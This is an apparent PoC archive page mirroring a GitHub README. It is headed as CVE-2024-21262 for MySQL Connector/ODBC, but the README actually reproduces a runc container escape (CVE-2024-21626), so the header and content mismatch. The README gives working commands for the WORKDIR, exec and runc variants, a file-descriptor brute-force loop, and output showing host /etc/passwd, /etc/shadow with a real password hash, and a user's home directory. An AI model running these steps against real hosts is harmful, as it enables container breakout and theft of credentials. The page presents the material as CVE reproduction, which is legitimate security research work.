Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2024-21262 PoC — Oracle MySQL 安全漏洞

Source
https://github.com/Noah4Puppy/CVE-2024-21262
Associated Vulnerability
Title:Oracle MySQL 安全漏洞 (CVE-2024-21262)
Description:Vulnerability in the MySQL Connectors product of Oracle MySQL (component: Connector/ODBC). Supported versions that are affected are 9.0.0 and prior. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Connectors. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Connectors accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of MySQL Connectors. CVSS 3.1 Base Score 6.5 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L).
Description
THREE different reproduction, WORKDIR, EXEC & RUNC.
Readme
# RECORDS
Only for reproduction of CVEs.

Related Resources:

- [LINK](https://nitroc.org/en/posts/cve-2024-21626-illustrated/?utm_source=chatgpt.com#exploit-via-docker-exec)
- [GITHUB_1](https://github.com/V0WKeep3r/CVE-2024-21626-runcPOC#)
- [GITHUB_2](https://github.com/cdxiaodong/CVE-2024-21626)
- [ISSUE](https://github.com/NitroCao/CVE-2024-21626/issues/1)
----
## Check Envs
Download docker-24.0.6.tgz from https://download.docker.com/linux/static/stable/x86_64/.
```shell
sudo mkdir -p /usr/local/docker-24.0.6

sudo tar -xzf docker-24.0.6.tgz -C /usr/local/docker-24.0.6

sudo ln -sf /usr/local/docker-24.0.6/docker/* /usr/local/bin/

sudo ln -sf /usr/local/docker-24.0.6/docker/docker /usr/local/bin/docker

runc --version
docker --version
containerd --version
```
Your expectation:
install X<=24.0.6 docker with Y<=1.1.9 runc.
```shell
runc version 1.1.9
commit: v1.1.9-0-gccaecfc
spec: 1.0.2-dev
go: go1.20.7
libseccomp: 2.5.1

Docker version 24.0.6, build ed223bc

containerd github.com/containerd/containerd v1.7.3 7880925980b188f4c97b462f709d0db8e8962aff
```

My Environment:
- Ubuntu 20.04
- Docker 24.0.6
- runc 1.1.9
- containerd 1.7.3


## SET daemon.json
```shell
sudo gedit /etc/docker/daemon.json
```
ADD this:
```json
{
  "registry-mirrors": [
    "https://docker.imgdb.de",
    "https://docker.xuanyuan.me",
    "https://doublezonline.cloud",
    "https://docker.wanpeng.top"
  ]
}
```
system debian:
```shell
systemctl daemon-reload
systemctl restart docker
```
static tgz:(temporary each time reset)
```shell
sudo pkill dockerd 2>/dev/null || true
sudo dockerd &
```
New terminal:
```shell
docker version
docker run hello-world
```

## ADD USER
```shell
sudo usermod -aG docker $USER
newgrp docker
id
```


## WORKDIR
`fd/?` can be detected by bomb:
```shell
#!/bin/bash
for i in {3..10} ; do
    docker run -w /proc/1/fd/$i ubuntu cat ../../../../../etc/passwd 
done
```

```shell
docker run -w /proc/1/fd/9 ubuntu:latest cat ../../../../../etc/passwd
# if it fails, use:
# docker run -w /proc/self/fd/9 ubuntu:latest cat ../../../../../etc/shadow
# docker run -w /proc/self/fd/9 ubuntu:latest cat ../../../../../etc/passwd 
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:115::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:109:116:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:110:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
rtkit:x:111:117:RealtimeKit,,,:/proc:/usr/sbin/nologin
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
cups-pk-helper:x:113:120:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
avahi:x:115:121:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
saned:x:117:123::/var/lib/saned:/usr/sbin/nologin
nm-openvpn:x:118:124:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
hplip:x:119:7:HPLIP system user,,,:/run/hplip:/bin/false
whoopsie:x:120:125::/nonexistent:/bin/false
colord:x:121:126:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
fwupd-refresh:x:122:127:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
geoclue:x:123:128::/var/lib/geoclue:/usr/sbin/nologin
pulse:x:124:129:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
gnome-initial-setup:x:125:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:126:131:Gnome Display Manager:/var/lib/gdm3:/bin/false
sssd:x:127:132:SSSD system user,,,:/var/lib/sss:/usr/sbin/nologin
puppy:x:1000:1000:puppy,,,:/home/puppy:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
```

## EXEC
shell: -> in container
```shell
# open a terminal 1
docker run --name test_book --rm -it debian:bookworm
# failure
# ln -sf /proc/self/fd/8 /bar
# success
ln -sf /proc/self/fd/7 /test

# open a new terminal 2
docker exec -it -w /bar test_book sleep 1200
# 3,6,9->unknown
# 1,2,4,5,8->unexisted
# 7 success no output

# return terminal 1
ls -F /proc
# check the latest id as your choice 

cat /proc/id/cmdline
# cat/proc/id/cmdline (try each one until occur: sleep1200)
# once: cat /proc/184/cmdline
ls -al /proc/id/cwd/../../../../home

ls -al /proc/184/cwd/../../../../home
# success
total 12
drwxr-xr-x  3 root root 4096 Mar 25  2025 .
drwxr-xr-x 20 root root 4096 Mar 25  2025 ..
drwxr-xr-x 20 1000 1000 4096 Oct  8 08:56 puppy

# enter home/user
ls -al /proc/184/cwd/../../../../home/puppy
# success
total 108
drwxr-xr-x 20 1000 1000  4096 Oct  8 08:56 .
drwxr-xr-x  3 root root  4096 Mar 25  2025 ..
-rw-------  1 1000 1000 10382 Oct 10 06:49 .bash_history
-rw-r--r--  1 1000 1000   220 Mar 25  2025 .bash_logout
-rw-r--r--  1 1000 1000  3771 Mar 25  2025 .bashrc
drwx------ 16 1000 1000  4096 Oct  8 11:05 .cache
drwx------ 14 1000 1000  4096 Oct  7 13:40 .config
drwx------  3 1000 1000  4096 Mar 25  2025 .gnupg
drwx------  5 1000 1000  4096 Oct  8 11:14 .local
drwx------  4 1000 1000  4096 Mar 27  2025 .mozilla
-rw-r--r--  1 1000 1000   367 Mar 27  2025 .pam_environment
drwx------  3 1000 1000  4096 Oct  7 13:40 .pki
-rw-r--r--  1 1000 1000   807 Mar 25  2025 .profile
drwx------  2 1000 1000  4096 Oct  8 08:56 .ssh
-rw-r--r--  1 1000 1000     0 Mar 27  2025 .sudo_as_admin_successful
drwxrwxr-x  4 1000 1000  4096 Oct  7 13:40 .vscode
drwxrwxr-x  8 1000 1000  4096 Oct  8 14:30 Assignments
drwxr-xr-x  2 1000 1000  4096 Mar 25  2025 Desktop
drwxr-xr-x  2 1000 1000  4096 Mar 25  2025 Documents
drwxr-xr-x  2 1000 1000  4096 Mar 27  2025 Downloads
drwxr-xr-x  2 1000 1000  4096 Mar 25  2025 Music
drwxr-xr-x  2 1000 1000  4096 Mar 25  2025 Pictures
drwxr-xr-x  2 1000 1000  4096 Mar 25  2025 Public
drwxr-xr-x  2 1000 1000  4096 Mar 25  2025 Templates
drwxr-xr-x  2 1000 1000  4096 Mar 25  2025 Videos
drwx------  3 1000 1000  4096 Mar 27  2025 snap

cat /proc/id/cwd/../../../../etc/hostname

cat /proc/184/cwd/../../../../etc/hostname
# puppy-virtual-machine
cat /etc/hostname
current container root
```

-------------------

## RUNC directly
- check runc version:
```shell
runc --version
runc version 1.1.9
commit: v1.1.9-0-gccaecfc
spec: 1.0.2-dev
go: go1.20.7
libseccomp: 2.5.1
```
- Steps:
```shell
docker run --name helper-ctr alpine

# save tar as launching
docker export helper-ctr --output alpine.tar
mkdir rootfs
tar xf alpine.tar -C rootfs
runc spec

# create config.json
# most condition is 7, else use bomb to get
sed -ri 's#(\s*"cwd":)"(/)"#\1 "/proc/self/fd/7"#g' config.json

gedit config.json
# edit "cwd": "/proc/self/fd/8", id=7 is not OK for my env
grep cwd config.json

# --log
sudo runc --log ./log.json run demo
# Failure it means your cwd is wrong: 
runc run failed: unable to start container process: error during container init: mkdir /proc/self/fd/7: no such file or directory
# Success enter shellcode and get root
whoami
root

# get shadow and passwd
cat ./../../../../../etc/shadow
cat ./../../../../../etc/passwd
# shadow info
root:!:20172:0:99999:7:::
daemon:*:19432:0:99999:7:::
bin:*:19432:0:99999:7:::
sys:*:19432:0:99999:7:::
sync:*:19432:0:99999:7:::
games:*:19432:0:99999:7:::
man:*:19432:0:99999:7:::
lp:*:19432:0:99999:7:::
mail:*:19432:0:99999:7:::
news:*:19432:0:99999:7:::
uucp:*:19432:0:99999:7:::
proxy:*:19432:0:99999:7:::
www-data:*:19432:0:99999:7:::
backup:*:19432:0:99999:7:::
list:*:19432:0:99999:7:::
irc:*:19432:0:99999:7:::
gnats:*:19432:0:99999:7:::
nobody:*:19432:0:99999:7:::
systemd-network:*:19432:0:99999:7:::
systemd-resolve:*:19432:0:99999:7:::
systemd-timesync:*:19432:0:99999:7:::
messagebus:*:19432:0:99999:7:::
syslog:*:19432:0:99999:7:::
_apt:*:19432:0:99999:7:::
tss:*:19432:0:99999:7:::
uuidd:*:19432:0:99999:7:::
tcpdump:*:19432:0:99999:7:::
avahi-autoipd:*:19432:0:99999:7:::
usbmux:*:19432:0:99999:7:::
rtkit:*:19432:0:99999:7:::
dnsmasq:*:19432:0:99999:7:::
cups-pk-helper:*:19432:0:99999:7:::
speech-dispatcher:!:19432:0:99999:7:::
avahi:*:19432:0:99999:7:::
kernoops:*:19432:0:99999:7:::
saned:*:19432:0:99999:7:::
nm-openvpn:*:19432:0:99999:7:::
hplip:*:19432:0:99999:7:::
whoopsie:*:19432:0:99999:7:::
colord:*:19432:0:99999:7:::
fwupd-refresh:*:19432:0:99999:7:::
geoclue:*:19432:0:99999:7:::
pulse:*:19432:0:99999:7:::
gnome-initial-setup:*:19432:0:99999:7:::
gdm:*:19432:0:99999:7:::
sssd:*:19432:0:99999:7:::
puppy:$6$n.X.gr9p8dot4UMU$SZvp7KLsk3E/M4Nedom.7R27UzvXi5gqA7Z6z51GFyIl2yehiytV23REPy22XoiF7jBvRdv.uWqs1vnvvGEy30:20172:0:99999:7:::
systemd-coredump:!!:20172::::::
```

**Pay attention to file descriptors, in different environment, sometimes the value of key cwd is different so it needs to run bomb scripts.**
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →